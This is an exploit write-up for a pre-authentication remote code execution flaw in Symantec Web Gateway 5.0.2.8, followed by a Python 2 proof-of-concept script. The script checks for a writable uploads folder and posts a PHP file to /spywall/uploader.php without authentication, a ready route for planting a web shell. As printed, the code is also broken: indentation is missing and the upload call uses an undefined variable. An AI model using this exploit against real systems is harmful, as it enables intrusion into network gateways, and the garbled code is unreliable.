Symantec Web Gateway version 5.0.2.8 pre-authentication remote code execution exploit.
4626e1e8d0204fec4863f5b78c64b0a5
# Title: Preauth RCE in Symantec Web Gateway 5.0.2.8
# Date: 26.03.2020
# Vendor: www.symantec.com
# Vulnerable software: www.symantec.com
# Repo: https://github.com/c610/free/
#!/usr/bin/env python
# seemantech.py - small preauth poc for symantec web gateway
# 27.03.2020 by code610
#
# more : https://twitter.com/CodySixteen
# https://code610.blogspot.com
#
# to use this bug:
# - uploads folder must exists on remote host
# - and it must be writable
#
# have fun
#
import sys, re
import requests
target = sys.argv[1]
def main():
print 'symantec web gateway preauth rce poc'
print ' seemantech.py - vs - %s' % ( target )
print ''
baseUrl = target
uploadUrl = target + '/uploads/'
checkBase = requests.get(target,verify=False)
check_status = checkBase.status_code
if check_status == 200:
print '[+] target alive, checking uploads'
checkUpload = requests.get(uploadUrl, verify=False)
isthereupload = checkUpload.status_code
if isthereupload == 200:
print '[+] uploads exists! continuing...'
uploader = target + '/spywall/uploader.php'
upshell = open('sh.php','w')
upshell.write('<?php phpinfo();')
upshell.close()
up_data = {
'file':open('sh.php','rb')
}
upme = requests.post(uploader, files=files, verify=False)
upresp = upme.text
print upresp
# run me:
if __name__ == '__main__':
main()